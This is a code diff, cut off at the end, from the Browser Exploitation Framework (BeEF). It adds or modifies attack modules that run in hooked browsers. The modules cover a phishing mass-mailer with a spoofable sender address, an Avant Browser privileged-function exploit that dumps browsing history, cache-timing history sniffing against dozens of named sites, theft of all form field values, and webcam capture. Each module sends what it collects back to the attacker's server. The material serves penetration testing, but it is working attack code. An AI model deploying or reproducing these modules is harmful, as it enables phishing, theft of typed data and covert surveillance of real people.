rel_boundary = "------------#{random_string(24)}"
|
||||
|
||||
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
|
||||
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
|
||||
rel_header = email_related(rel_boundary)
|
||||
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
|
||||
|
||||
images = ""
|
||||
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
|
||||
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
|
||||
end
|
||||
header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
|
||||
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
|
||||
rel_header = email_related(rel_boundary)
|
||||
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
|
||||
|
||||
attachments = ""
|
||||
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
|
||||
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
|
||||
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
|
||||
end
|
||||
end
|
||||
images = ""
|
||||
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
|
||||
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
|
||||
end
|
||||
|
||||
close = email_close(boundary)
|
||||
attachments = ""
|
||||
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
|
||||
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
|
||||
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
|
||||
end
|
||||
end
|
||||
|
||||
message = header + plain_body + rel_header + html_body + images + attachments + close
|
||||
print_debug "Raw Email content:\n #{message}"
|
||||
message
|
||||
close = email_close(boundary)
|
||||
rescue Exception => e
|
||||
print_error "Error constructing email."
|
||||
raise
|
||||
end
|
||||
|
||||
message = header + plain_body + rel_header + html_body + images + attachments + close
|
||||
print_debug "Raw Email content:\n #{message}"
|
||||
message
|
||||
end
|
||||
|
||||
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
|
||||
|
||||
@@ -70,6 +70,7 @@ module BeEF
|
||||
# "template": "default",
|
||||
# "subject": "Hi from BeEF",
|
||||
# "fromname": "BeEF",
|
||||
# "fromaddr": "beef@beef.com",
|
||||
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
|
||||
# "linktext": "http://beefproject.com",
|
||||
# "recipients": [{
|
||||
@@ -85,10 +86,11 @@ module BeEF
|
||||
template = body["template"]
|
||||
subject = body["subject"]
|
||||
fromname = body["fromname"]
|
||||
fromaddr = body["fromaddr"]
|
||||
link = body["link"]
|
||||
linktext = body["linktext"]
|
||||
|
||||
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
|
||||
if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
|
||||
print_error "All parameters are mandatory."
|
||||
halt 401
|
||||
end
|
||||
@@ -106,11 +108,16 @@ module BeEF
|
||||
halt 401
|
||||
end
|
||||
end
|
||||
|
||||
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
|
||||
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
|
||||
rescue Exception => e
|
||||
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
|
||||
print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
|
||||
error 400
|
||||
end
|
||||
|
||||
begin
|
||||
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
|
||||
mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
|
||||
rescue Exception => e
|
||||
print_error "Invalid mailer configuration"
|
||||
error 400
|
||||
end
|
||||
end
|
||||
|
||||
@@ -15,37 +15,33 @@
|
||||
//
|
||||
beef.execute(function() {
|
||||
|
||||
|
||||
if (!beef.browser.isA()) {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
|
||||
return;
|
||||
}
|
||||
|
||||
var avant_iframe = document.createElement("iframe");
|
||||
//var avant_iframe = beef.dom.createInvisibleIframe();
|
||||
avant_iframe.setAttribute('src', "browser:home");
|
||||
avant_iframe.setAttribute('name','test2');
|
||||
avant_iframe.setAttribute('width','0');
|
||||
avant_iframe.setAttribute('heigth','0');
|
||||
avant_iframe.setAttribute('src', 'browser:home');
|
||||
avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
|
||||
avant_iframe.setAttribute('width', '0');
|
||||
avant_iframe.setAttribute('heigth', '0');
|
||||
avant_iframe.setAttribute('scrolling','no');
|
||||
avant_iframe.setAttribute('style', 'display:none');
|
||||
|
||||
document.body.appendChild(avant_iframe);
|
||||
|
||||
var vstr = {value: ""};
|
||||
|
||||
if(window['test2'].navigator) {
|
||||
//This works if FF is the rendering engine
|
||||
window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
|
||||
|
||||
if (window['avant_history_<%= @command_id %>'].navigator) {
|
||||
//This works if FF is the rendering engine
|
||||
window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
|
||||
} else {
|
||||
// this works if Chrome is the rendering engine
|
||||
//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
|
||||
}
|
||||
else {
|
||||
// this works if Chrome is the rendering engine
|
||||
//window['test2'].AFRunCommand(60003, vstr);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -19,7 +19,7 @@ beef:
|
||||
enable: true
|
||||
category: "Browser"
|
||||
name: "Get Visited URLs (Avant Browser)"
|
||||
description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
|
||||
description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
|
||||
authors: ["Roberto Suggi Liverani"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
working: ["FF"]
|
||||
|
||||
44
modules/browser/detect_office/command.js
Normal file
44
modules/browser/detect_office/command.js
Normal file
@@ -0,0 +1,44 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var ma = 1;
|
||||
var mb = 1;
|
||||
var mc = 1;
|
||||
var md = 1;
|
||||
try {
|
||||
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
|
||||
} catch (e) {}
|
||||
try {
|
||||
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
|
||||
} catch (e) {}
|
||||
try {
|
||||
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
|
||||
} catch (e) {}
|
||||
try {
|
||||
md = new ActiveXObject("SharePoint.OpenDocuments.1")
|
||||
} catch (e) {}
|
||||
var a = typeof ma;
|
||||
var b = typeof mb;
|
||||
var c = typeof mc;
|
||||
var d = typeof md;
|
||||
var key = "No Office Found";
|
||||
if (a == "object" && b == "object" && c == "object" && d == "object") {
|
||||
key = "Office 2010"
|
||||
}
|
||||
if (a == "number" && b == "object" && c == "object" && d == "object") {
|
||||
key = "Office 2007"
|
||||
}
|
||||
if (a == "number" && b == "number" && c == "object" && d == "object") {
|
||||
key = "Office 2003"
|
||||
}
|
||||
if (a == "number" && b == "number" && c == "number" && d == "object") {
|
||||
key = "Office Xp"
|
||||
}
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
|
||||
|
||||
});
|
||||
|
||||
16
modules/browser/detect_office/config.yaml
Normal file
16
modules/browser/detect_office/config.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
detect_office:
|
||||
enable: true
|
||||
category: "Browser"
|
||||
name: "Detect MS Office"
|
||||
description: "This module detect the version of MS Office if installed"
|
||||
authors: ["nbblrr"]
|
||||
target:
|
||||
working: ["IE"]
|
||||
not_working: ["All"]
|
||||
14
modules/browser/detect_office/module.rb
Normal file
14
modules/browser/detect_office/module.rb
Normal file
@@ -0,0 +1,14 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Detect_office < BeEF::Core::Command
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content['office'] = @datastore['office']
|
||||
save content
|
||||
end
|
||||
|
||||
end
|
||||
@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
|
||||
var MAX_ATTEMPTS = 1;
|
||||
}
|
||||
|
||||
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
|
||||
if (beef.browser.isO() == 1){
|
||||
/****************
|
||||
* SCANNED URLS *
|
||||
****************/
|
||||
@@ -212,7 +212,7 @@ function perform_check() {
|
||||
if (beef.browser.isFF() == 1) {
|
||||
setTimeout(wait_for_read, 1);
|
||||
}
|
||||
if(beef.browser.isC() == 1 || beef.browser.isO() == 1){
|
||||
if(beef.browser.isO() == 1){
|
||||
setTimeout(wait_for_read, 1);
|
||||
}
|
||||
}
|
||||
@@ -242,11 +242,10 @@ function wait_for_read() {
|
||||
setTimeout(wait_for_read, 0);
|
||||
}
|
||||
}
|
||||
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
|
||||
if (beef.browser.isO() == 1){
|
||||
try{
|
||||
if(frames['f'].location.href != 'about:blank'){
|
||||
throw 1;
|
||||
}
|
||||
|
||||
if(frames['f'].location.href != 'about:blank') throw 1;
|
||||
|
||||
frames['f'].stop();
|
||||
document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
|
||||
@@ -280,7 +279,7 @@ function navigate_to_target() {
|
||||
if (beef.browser.isIE() == 1) {
|
||||
setTimeout(wait_for_noread, 0);
|
||||
}
|
||||
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
|
||||
if (beef.browser.isO() == 1){
|
||||
setTimeout(wait_for_noread, 1);
|
||||
}
|
||||
urls++;
|
||||
@@ -318,7 +317,7 @@ function wait_for_noread() {
|
||||
}
|
||||
sched_call(wait_for_noread);
|
||||
}
|
||||
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){
|
||||
if (beef.browser.isO() == 1){
|
||||
if (frames['f'].location.href == undefined){
|
||||
confirm_visited = true;
|
||||
throw 1;
|
||||
@@ -343,7 +342,7 @@ function maybe_test_next() {
|
||||
if (beef.browser.isIE() == 1) {
|
||||
document.getElementById("f").src = 'about:blank';
|
||||
}
|
||||
if (beef.browser.isC() == 1 || beef.browser.isO() == 1) {
|
||||
if (beef.browser.isO() == 1) {
|
||||
document.getElementById('f').src = 'about:blank';
|
||||
}
|
||||
if (target_off < targets.length) {
|
||||
@@ -396,7 +395,7 @@ function reload(){
|
||||
/* The handler for "run the test" button on the main page. Dispenses
|
||||
advice, resets state if necessary. */
|
||||
function start_stuff() {
|
||||
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) {
|
||||
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
|
||||
target_off = 0;
|
||||
attempt = 0;
|
||||
confirmed_visited = false;
|
||||
@@ -409,11 +408,139 @@ function start_stuff() {
|
||||
}
|
||||
}
|
||||
|
||||
/**************/
|
||||
/***Visipisi***/
|
||||
/**************/
|
||||
var vp_result = {};
|
||||
|
||||
var visipisi = {
|
||||
webkit: function(url, cb) {
|
||||
var start;
|
||||
var loaded = false;
|
||||
var runtest = function() {
|
||||
window.removeEventListener("message", runtest, false);
|
||||
var img = new Image();
|
||||
start = new Date().getTime();
|
||||
try{
|
||||
img.src = url;
|
||||
} catch(e) {}
|
||||
var messageCB = function (e){
|
||||
var now = new Date().getTime();
|
||||
if (img.complete) {
|
||||
delete img;
|
||||
window.removeEventListener("message", messageCB, false);
|
||||
cbWrap(true);
|
||||
} else if (now - start > 10) {
|
||||
delete img;
|
||||
if (window.stop !== undefined)
|
||||
window.stop();
|
||||
else
|
||||
document.execCommand("Stop",false);
|
||||
window.removeEventListener("message", messageCB, false);
|
||||
cbWrap(false);
|
||||
} else {
|
||||
window.postMessage('','*');
|
||||
}
|
||||
|
||||
};
|
||||
window.addEventListener("message", messageCB, false);
|
||||
window.postMessage('','*');
|
||||
};
|
||||
cbWrap = function (value) {cb(value);};
|
||||
window.addEventListener("message", runtest, false);
|
||||
window.postMessage('','*');
|
||||
}
|
||||
};
|
||||
|
||||
function visipisiCB(vp, endCB, sites, urls, site, result){
|
||||
if(result === null){
|
||||
vp_result[site] = 'Whoops';
|
||||
}
|
||||
else{
|
||||
vp_result[site] = result ? 'visited' : 'not visited';
|
||||
}
|
||||
var next_site = sites.pop();
|
||||
if(next_site)
|
||||
vp( urls[next_site], function (result) {
|
||||
visipisiCB(vp, endCB, sites, urls, next_site, result);
|
||||
});
|
||||
else
|
||||
endCB();
|
||||
}
|
||||
|
||||
function getVisitedDomains(){
|
||||
var tests = {
|
||||
facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
|
||||
twitter: 'https://twitter.com/images/spinner.gif',
|
||||
digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
|
||||
reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
|
||||
hn: 'http://ycombinator.com/images/y18.gif',
|
||||
stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
|
||||
wired: 'http://www.wired.com/images/home/wired_logo.gif',
|
||||
xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
|
||||
linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
|
||||
slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
|
||||
myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
|
||||
engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
|
||||
lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
|
||||
pandora: 'http://www.pandora.com/img/logo.png',
|
||||
youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
|
||||
yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
|
||||
google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
|
||||
hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
|
||||
cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
|
||||
bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
|
||||
reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
|
||||
wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
|
||||
amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
|
||||
ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
|
||||
newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
|
||||
bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
|
||||
walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
|
||||
perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
|
||||
abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
|
||||
msy: 'http://msy.com.au/images/MSYLogo-long.gif',
|
||||
techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
|
||||
borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
|
||||
mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
|
||||
anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
|
||||
tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
|
||||
shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
|
||||
staticice: 'http://staticice.com.au/images/banner.jpg',
|
||||
};
|
||||
|
||||
var sites = [];
|
||||
for (var k in tests)
|
||||
sites.push(k);
|
||||
sites.reverse();
|
||||
|
||||
vp = visipisi.webkit;
|
||||
var first_site = sites.pop();
|
||||
var end = function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
|
||||
}
|
||||
vp(tests[first_site], function(result) {
|
||||
visipisiCB(vp, end, sites, tests, first_site, result);
|
||||
});
|
||||
}
|
||||
|
||||
function prepResult(results){
|
||||
var result_str ='<br>';
|
||||
for(r in results){
|
||||
result_str += r + ':' + results[r]+'<br>';
|
||||
}
|
||||
return result_str;
|
||||
}
|
||||
|
||||
beef.execute(function() {
|
||||
if(beef.browser.isC() == 1){
|
||||
getVisitedDomains();
|
||||
|
||||
} else {
|
||||
urls = undefined;
|
||||
exec_next = null;
|
||||
start_stuff();
|
||||
}
|
||||
});
|
||||
|
||||
|
||||
|
||||
@@ -10,7 +10,7 @@ beef:
|
||||
category: "Browser"
|
||||
name: "Get Visited Domains"
|
||||
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
|
||||
authors: ["@keith55", "quentin"]
|
||||
authors: ["@keith55", "oxplot", "quentin"]
|
||||
target:
|
||||
working: ["FF", "IE", "O"]
|
||||
not_working: ["C", "S"]
|
||||
|
||||
@@ -10,6 +10,6 @@ beef:
|
||||
category: ["Browser", "Hooked Domain"]
|
||||
name: "Replace Component (Deface)"
|
||||
description: "Overwrite a particular component of the hooked page."
|
||||
authors: ["antisnatchor","xntrik"]
|
||||
authors: ["antisnatchor", "xntrik"]
|
||||
target:
|
||||
user_notify: ['ALL']
|
||||
|
||||
28
modules/browser/hooked_domain/get_form_values/command.js
Normal file
28
modules/browser/hooked_domain/get_form_values/command.js
Normal file
@@ -0,0 +1,28 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var form_data = new Array();
|
||||
|
||||
// loop through all forms
|
||||
for (var f=0; f < document.forms.length; f++) {
|
||||
// store type,name,value for all input fields
|
||||
for (var i=0; i < document.forms[f].elements.length; i++) {
|
||||
form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
|
||||
}
|
||||
}
|
||||
|
||||
// return form data
|
||||
if (form_data.length) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
|
||||
// return if no input fields were found
|
||||
} else {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
|
||||
}
|
||||
|
||||
});
|
||||
|
||||
@@ -5,11 +5,11 @@
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
zenoss_daemon_csrf:
|
||||
get_form_values:
|
||||
enable: true
|
||||
category: "Exploits"
|
||||
name: "Zenoss 3.x Daemon CSRF"
|
||||
description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
|
||||
category: ["Browser", "Hooked Domain"]
|
||||
name: "Get Form Values"
|
||||
description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
14
modules/browser/hooked_domain/get_form_values/module.rb
Normal file
14
modules/browser/hooked_domain/get_form_values/module.rb
Normal file
@@ -0,0 +1,14 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Get_form_values < BeEF::Core::Command
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content['form_data'] = @datastore['form_data']
|
||||
save content
|
||||
end
|
||||
|
||||
end
|
||||
@@ -22,7 +22,7 @@ beef.execute(function() {
|
||||
|
||||
|
||||
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
|
||||
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
|
||||
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){ }';
|
||||
|
||||
//This function is called by swfobject, if if fails to add the flash file to the page
|
||||
|
||||
|
||||
50
modules/browser/webcam_html5/command.js
Normal file
50
modules/browser/webcam_html5/command.js
Normal file
@@ -0,0 +1,50 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
|
||||
|
||||
beef.execute(function() {
|
||||
var vid_id = beef.dom.generateID();
|
||||
var can_id = beef.dom.generateID();
|
||||
var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
|
||||
var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
|
||||
$j('body').append(vid_el);
|
||||
$j('body').append(can_el);
|
||||
|
||||
var ctx = can_el.getContext('2d');
|
||||
|
||||
var localMediaStream = null;
|
||||
|
||||
var cap = function() {
|
||||
if (localMediaStream) {
|
||||
ctx.drawImage(vid_el,0,0);
|
||||
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
|
||||
} else {
|
||||
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
|
||||
}
|
||||
}
|
||||
|
||||
window.URL = window.URL || window.webkitURL;
|
||||
navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
|
||||
|
||||
navigator.getUserMedia({video:true},function(stream) {
|
||||
vid_el.src = window.URL.createObjectURL(stream);
|
||||
localMediaStream = stream;
|
||||
setTimeout(cap,2000);
|
||||
|
||||
}, function(err) {
|
||||
beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
|
||||
});
|
||||
|
||||
|
||||
|
||||
|
||||
});
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
16
modules/browser/webcam_html5/config.yaml
Normal file
16
modules/browser/webcam_html5/config.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
webcam_html5:
|
||||
enable: true
|
||||
category: "Browser"
|
||||
name: "Webcam HTML5"
|
||||
description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
|
||||
authors: ["xntrik"]
|
||||
target:
|
||||
user_notify: ["C"]
|
||||
unknown: ["All"]
|
||||
16
modules/browser/webcam_html5/module.rb
Normal file
16
modules/browser/webcam_html5/module.rb
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
require 'base64'
|
||||
class Webcam_html5 < BeEF::Core::Command
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content["result"] = @datastore["result"] if not @datastore["result"].nil?
|
||||
content["image"] = @datastore["image"] if not @datastore["image"].nil?
|
||||
save content
|
||||
end
|
||||
|
||||
end
|
||||
54
modules/browser/webcam_permission_check/cameraCheck.as
Normal file
54
modules/browser/webcam_permission_check/cameraCheck.as
Normal file
@@ -0,0 +1,54 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
// Source ActionScript for cameraCheck.swf
|
||||
package {
|
||||
|
||||
import flash.display.Sprite;
|
||||
import flash.external.ExternalInterface;
|
||||
import flash.media.Camera;
|
||||
import flash.system.Security;
|
||||
import flash.system.SecurityPanel;
|
||||
|
||||
public class CamCheck extends Sprite {
|
||||
|
||||
var _cam:Camera;
|
||||
|
||||
public function CamCheck() {
|
||||
|
||||
if (Camera.isSupported) {
|
||||
this._cam = Camera.getCamera();
|
||||
|
||||
if (!this._cam) {
|
||||
|
||||
//Either the camera is not available or some other error has occured
|
||||
ExternalInterface.call("naPermissions");
|
||||
|
||||
} else if (this._cam.muted) {
|
||||
|
||||
//The user has not allowed access to the camera
|
||||
ExternalInterface.call("noPermissions");
|
||||
|
||||
// Uncomment this show the privacy/security settings window
|
||||
//Security.showSettings(SecurityPanel.PRIVACY);
|
||||
} else {
|
||||
|
||||
//The user has allowed access to the camera
|
||||
ExternalInterface.call("yesPermissions");
|
||||
}
|
||||
|
||||
} else {
|
||||
|
||||
//Camera Not Supported
|
||||
ExternalInterface.call("naPermissions");
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
BIN
modules/browser/webcam_permission_check/cameraCheck.swf
Normal file
BIN
modules/browser/webcam_permission_check/cameraCheck.swf
Normal file
Binary file not shown.
79
modules/browser/webcam_permission_check/command.js
Normal file
79
modules/browser/webcam_permission_check/command.js
Normal file
@@ -0,0 +1,79 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
|
||||
//These 3 functions [naPermissions() The camera is not available or not supported
|
||||
// yesPermissions() The user is allowing access to the camera / mic
|
||||
// yesPermissions() The user has not allowed access to the camera / mic
|
||||
// Flash will invoke these functions directly.
|
||||
//var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
|
||||
|
||||
//This function is called by swfobject, if if fails to add the flash file to the page
|
||||
|
||||
//js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
|
||||
|
||||
//These functions are global so they can accessed by the cameraCheck.swf file
|
||||
|
||||
noPermissions = function() {
|
||||
beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
|
||||
}
|
||||
|
||||
yesPermissions = function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D");
|
||||
}
|
||||
|
||||
naPermissions = function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
|
||||
}
|
||||
|
||||
//After the swfobject loads the SWF file, this callback sends a status back to BeEF
|
||||
|
||||
